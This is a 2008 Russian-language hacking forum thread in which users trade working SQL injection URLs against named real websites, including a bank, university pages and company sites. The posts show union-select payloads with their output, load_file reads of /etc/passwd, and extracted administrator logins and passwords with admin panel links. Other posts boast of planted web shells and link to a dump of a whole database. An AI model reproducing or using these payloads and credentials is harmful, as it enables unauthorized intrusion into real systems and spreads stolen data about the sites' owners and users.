23.06.2008, 16:04
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
С нами:
9447835
Репутация:
13
|
|
Ляпис Трубецкой рулит))
http://www.lyapis.com/anons.php?id=-1+union+select+1,user,3,4,5/*
Database Version: 4.1.22-standard
Database name: lyapis_lyapis
User name: lyapis_lyapis@localhost
Последний раз редактировалось bakl; 23.06.2008 в 16:06..
|
|
|
23.06.2008, 17:43
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
С нами:
9983906
Репутация:
627
|
|
Сегодня на нашем операционном столе сайт alfavideo.ru от группы компаний альфа арсенал, системы безопасности, аж самому смешно, хорошая у них безопасность)))).
Приступим:
Имена таблиц
http://www.alfavideo.ru/services?pg=-9+union+select+1,TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES+limit+27,1/*
Колонки в таблице tbl_m_user
http://www.alfavideo.ru/services?pg=-9+union+select+1,COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x74626C5F6D5F75736572 +limit+1,1/*
Получаем всю инфу по админам
http://www.alfavideo.ru/services?pg=-9+union+select+1,concat(login,char(58),pass,char(5 8),email,char(58),r_name,char(58),phone,char(58),g roup_id,char(58),deleted)+FROM+tbl_m_user+limit+0, 1/*
Собстно логин и пасс 3х админчигов, которые были получены.
Steel:k15Xsp3
pro:k15Xsp3
Topotun:k15Xsp3
И админка: http://www.alfavideo.ru/admin/
Make fun! |
|
|
|
23.06.2008, 22:44
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
pr 3
http://www.crimelab.nl/csi.php?series=6666+union+select+111,version(),333 ,444,555,666,777,888,999,110,111,112,113,114,115,1 16,117,118,119,220,221,2221/*&page=index2
5.0.32-Debian_7etch5-log::crimelab@localhost::crimelab
Присутствует раскрытие путей: /home/aidoann/crimelab/welcome.html
Сообщение от Таблицы
albums.cpg11d_users
(http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+25,1/*&page=index2)
Сообщение от колонки
user_id,user_name,user_password,user_email
1 запись(liberque:::78ArK71)
albums.cpg1_users
http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+38,1/*&page=index2)
Сообщение от колонки
user_id,user_name,user_password,user_email
две записи (admin:::78ArK71 и liberque:::78ArK71:::liberque@liberque.nl)
inches.phpbb_users
(http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+97,1/*&page=index2)
Сообщение от колонки
user_id,username,user_password,user_email
здесь 149 записей
есть так же файл прив:
http://www.crimelab.nl/csi.php?series=6666+union+select+1,load_file(0x2f6 574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,21/*&page=index2
Наслаждайтесь
Последний раз редактировалось gisTy; 24.06.2008 в 05:04..
|
|
|
|
23.06.2008, 23:24
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Поддержим лоад_филе
Код:
http://www.747.ru/board/main/show/?id=-9999+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10/*
Red_Red1 спс.
Последний раз редактировалось Ch3ck; 23.06.2008 в 23:26..
|
|
|
|
24.06.2008, 05:02
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
PR 7
http://www.lib.umich.edu/grad/guide/guide.php?id=-4+union+select+1,2,concat_ws(char(58),id,name,uniq name,email),4,5,null,null,8,9+from+selector/*
PR 5
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a3a, version(),user(),database()),4,5,6,7,8,9,10,11,12, 13,14/*
version():5.0.27-standard-log
user():expressionin@76.12.19.204
database():expressionin
Есть раскрытие путей:
Код:
/vservers/expressionin/htdocs/
Есть интересная табличка:
Expressionin.users
--id,username,password,email
PR 4
http://www.mallenbaker.net/blog/post.php?id=-63+union+select+unhex(hex(concat_ws(0x3a3a,version (),user(),database()))),2,3/*
version():4.1.11-Debian_4sarge8-log
user():mallen@localhost
database():mallen
PR 3
http://www.hornets247.com/post.php?id=-55+union+select+1,2,concat(version(),0x3a3a,user() ,0x3a3a,database()),4,5/*
version():4.0.27-max-log
user():hornets247_v4_0@linhost194.prod.mesa1.secureserver .net
database():hornets247_v4_0
PR 3
http://blog.pmaster.net/post.php?id=-380+union+select+1,concat(version(),0x3a3a,user(), 0x3a3a,database()),null,null,null,null,null,null,n ull,null,11/*
version():4.1.22-log
user():pmaste_blog@localhost
database():pmaste_pmblog
Есть раскрытие путей:
/home/pmaste/public_html/blog/post.php
PR 3
http://www.elgranpoder.com/html/post.php?id=-165+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24/*
version():[b] 5.0.45-log
user():myelgranpode@localhost
database():wp3
PR 3
http://www.r31-rabota.ru/post.php?id=4481+union+select+1,concat_ws(0x3a3a,v ersion(),user(),database()),3,4,5,6,7,8,9,10,null, null,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
version():4.1.21-standard-log
user():pro_rabot@localhost
database():pro_r31rabota
PR 1
http://www.leoq2.com/board/post.php?id=-732+union+select+1,2,3,4,5,null,concat_ws(0x3a3a,v ersion(),user(),database()),8,9/*
version():5.0.24alyceu
user():leoq2_com@eu1349f.lyceu.net
database():leoq2_com_1
PR N/A
http://caxton.emich.edu/guide/guide.php?id=-237+union+select+1,2,concat_ws(char(58),id,name,un iqname,email),4,5,null,null,8,9+from+selector/*
PR N/A
http://www.ieei.pt/programas/post.php?id=38+union+select+concat_ws(0x3a3a,versi on(),user(),database()),2,3/*
version():4.0.26
user():ieeiuse_web@216.81.72.128
database():ieeiuse_db
Последний раз редактировалось gisTy; 03.07.2008 в 08:57..
|
|
|
|
24.06.2008, 05:39
|
|
Познающий
Регистрация: 07.04.2007
Сообщений: 88
С нами:
10050808
Репутация:
48
|
|
Бага
http://tid.odessa.ua/news/?newsid=-513+union+select+1,2,3,4,5/*
Глянем имя БД
http://tid.odessa.ua/news/?newsid=-513+union+select+concat_ws(0x3a3a,version(),user() ,database()),2,3,4,5/*
Облом... а если так??? 
http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
4.1.11-Debian_4sarge8-log::newtid@localhost::newtid
Бага
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,4,5
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0& idn=-1213960526+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5
5.0.45-Debian_1ubuntu3.3-log::rus1@10.0.0.46::news_music
Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.
Последний раз редактировалось furang; 24.06.2008 в 05:52..
|
|
|
|
24.06.2008, 06:14
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от furang
http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
намного удобнее если использовать конструкцию например так:
http://tid.odessa.ua/news/?newsid=-513+union+select+unhex(hex(concat_ws (0x3a3a,version(),user(),database()))),2 ,3,4,5/*
Последний раз редактировалось gisTy; 24.06.2008 в 09:23..
|
|
|
|
24.06.2008, 08:22
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 19
С нами:
9534714
Репутация:
10
|
|
Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
|
|
|
|
24.06.2008, 08:47
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
С нами:
9983906
Репутация:
627
|
|
Сообщение от #urbaner
Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
Прости, но я там на зареген. Нашел скуль сам, если не веришь, почитай предыдущие мои посты по скулям, или ты думаешь что я настолько тупой и их тоже скопипастил?
Этот сайт одна сплошная дырень, помимо моего шелла, там было еще 2, если быть точнее, то я раскрутил скуль 17/06/2008, а выложил только щас.
Так что сам делай выводы.
ЗЫ И уж кому, так точно не тебе меня учить, на себя лучше посмотри.
ЗЗЫ Вот ты и спалился, я ждал когда ты появишся, тебе привет от 26, я думаю ты сразу поймешь о ком я, чето вы долго сайт свой поднимали...
Если бы не 26 тогда тебе сказал про дыру, хер бы ты написал ту статью, я почему-то свой код запроса там узнаю. Я делал, отталкиваясь от этой статьи: https://forum.antichat.ru/thread43966.html, а вот тебе инфу слили...
xxx (18:17:43 17/06/2008)
data.php - твоё?
xxx (18:17:45 17/06/2008)
в папке
Лайт (18:18:01 17/06/2008)
нет
xxx (18:18:38 17/06/2008)
ипать
xxx (18:18:42 17/06/2008)
уже до нас кто-то залил
xxx (18:18:48 17/06/2008)
http://www.alfavideo.ru/img/data.php
Лайт (18:18:49 17/06/2008)
шелл?
xxx (18:18:51 17/06/2008)
гыыы
xxx (18:18:53 17/06/2008)
да
Лайт (18:18:58 17/06/2008)
ахахахаха
Лайт (18:19:00 17/06/2008)
ГЫЫЫЫ
xxx (18:19:05 17/06/2008)
ну судя по версии шелла, это был новичёк
PS А вот и дамп ВСЕЙ базы, качайте на здоровье! http://ifolder.ru/7090064
Дату создания файла только гляньте...
Ты не на того наехал олень.
Последний раз редактировалось Лайт; 24.06.2008 в 10:00..
|
|
|
|
24.06.2008, 13:15
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
С нами:
9447845
Репутация:
11
|
|
http://easynotebook.890m.com/notelist.php?exid=2785J&n=15)%20UNION%20SELECT%201 ,database(),3,4,5,version(),7/*
4.1.22-standard
(хотя ничего полезного там нету к сожалению)
слепая:
http://procreditbank.com.ua/?cat=130&num=220&news=3467%20AND%201=2
MYSQL 4.0.27-standard
база mfb
юзер mfb@rex.kiev.sovam.com
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
